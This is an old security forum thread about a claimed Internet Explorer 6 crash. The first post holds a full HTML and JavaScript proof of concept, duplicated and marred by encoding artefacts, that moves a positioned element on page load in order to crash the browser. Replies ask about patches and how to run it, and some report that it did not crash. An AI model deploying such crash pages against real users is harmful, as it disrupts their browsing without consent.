Page 1 of 2 12 LastLast
Results 1 to 10 of 16

Thread: IE 6 crash

  1. #1
    Senior Member
    Join Date
    Sep 2003
    Posts
    101

    IE 6 crash

    <html>

    <head>

    <title>CRASH-IE</title>

    <style type=3D"text/css">

    html, body {

    overflow-y: hidden;=20

    scrollbar-base-color: '#330066';=20

    }

    =20

    .crash {

    position:absolute;

    left:200px;

    top:200px;

    width:200px;

    }



    </style>

    <script type=3D"text/javascript">

    function galgenfrist() {

    window.setTimeout('crashIE();',1000);

    }



    function crashIE() {

    var moveNode =3D document.getElementById("move");

    if(moveNode) {

    moveNode.style.top =3D "100px";=20

    moveNode.style.left =3D "200px";

    }

    }

    </script>

    </head>

    <body onload=3D"galgenfrist();">

    <h1>CRASH-IE</h1>

    <div id=3D"move" class=3D"crash">

    <table>

    <tbody>

    <tr>

    <td>

    <textarea></textarea>

    </td>

    </tr>

    </tbody>

    </table>

    </div>

    </body>

    </html>

    <html>

    <head>

    <title>CRASH-IE</title>

    <style type=3D"text/css">

    html, body {

    overflow-y: hidden;=20

    scrollbar-base-color: '#330066';=20

    }

    =20

    .crash {

    position:absolute;

    left:200px;

    top:200px;

    width:200px;

    }



    </style>

    <script type=3D"text/javascript">

    function galgenfrist() {

    window.setTimeout('crashIE();',1000);

    }



    function crashIE() {

    var moveNode =3D document.getElementById("move");

    if(moveNode) {

    moveNode.style.top =3D "100px";=20

    moveNode.style.left =3D "200px";

    }

    }

    </script>

    </head>

    <body onload=3D"galgenfrist();">

    <h1>CRASH-IE</h1>

    <div id=3D"move" class=3D"crash">

    <table>

    <tbody>

    <tr>

    <td>

    <textarea></textarea>

    </td>

    </tr>

    </tbody>

    </table>

    </div>

    </body>

    </html>

    the above html should cause ie6 to crash immediately
    chown -r us ./bases

  2. #2
    Senior Member
    Join Date
    Aug 2002
    Posts
    547
    any way or patch to prevent that from happening with this code ? ? ? ?

  3. #3
    Elite Hacker
    Join Date
    Mar 2003
    Posts
    1,407
    `When you say "I wrote a program that crashed Windows", people just stare at
    you blankly and say "Hey, I got those with the system, *for free*".'
    (By Linus Torvalds)
    kindof applies since IE comes with windows and microsoft makes both.
    But seriously, thanks for the heads up.

  4. #4
    Member
    Join Date
    Oct 2003
    Posts
    78
    Mine didn't crash... just opened normally and worked fine.. got two lines of text and two text boxes..
    [pong][shadow]Why won\'t anyone give me greenies???[/shadow] [/pong]

  5. #5
    Senior Member
    Join Date
    Jul 2003
    Posts
    813
    Well I just saw the code :P But that's cuz I'm using Mozilla at this point... advance in technology
    /\\

  6. #6
    Junior Member
    Join Date
    Oct 2003
    Posts
    8

    Talking

    i couldn't get it to crash mine either.
    Check out the Big Brain on Brad!

  7. #7
    Senior Member gore's Avatar
    Join Date
    Oct 2002
    Location
    Michigan
    Posts
    7,177
    Originally posted here by ead23x3
    i couldn't get it to crash mine either.

    Leave it on for a few hours.

  8. #8
    Junior Member
    Join Date
    Aug 2003
    Posts
    12
    Um.. how do you go about to run the script?

    Thanx!

  9. #9
    Senior Member
    Join Date
    Oct 2002
    Posts
    141
    CyberArmy also has something similiar that is SUPPOSED to crash/and or shut down your computer if you fail their Zebulun challenges. The basic idea has been around for quite a while now, but good try

  10. #10
    Member
    Join Date
    Oct 2003
    Posts
    78
    knoledgesponge, some moron posted that a link a while back.. too bad Cyberarmy is down adn what not.. here's the link to the moron's post: http://www.antionline.com/showthread...hreadid=224037
    [pong][shadow]Why won\'t anyone give me greenies???[/shadow] [/pong]

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •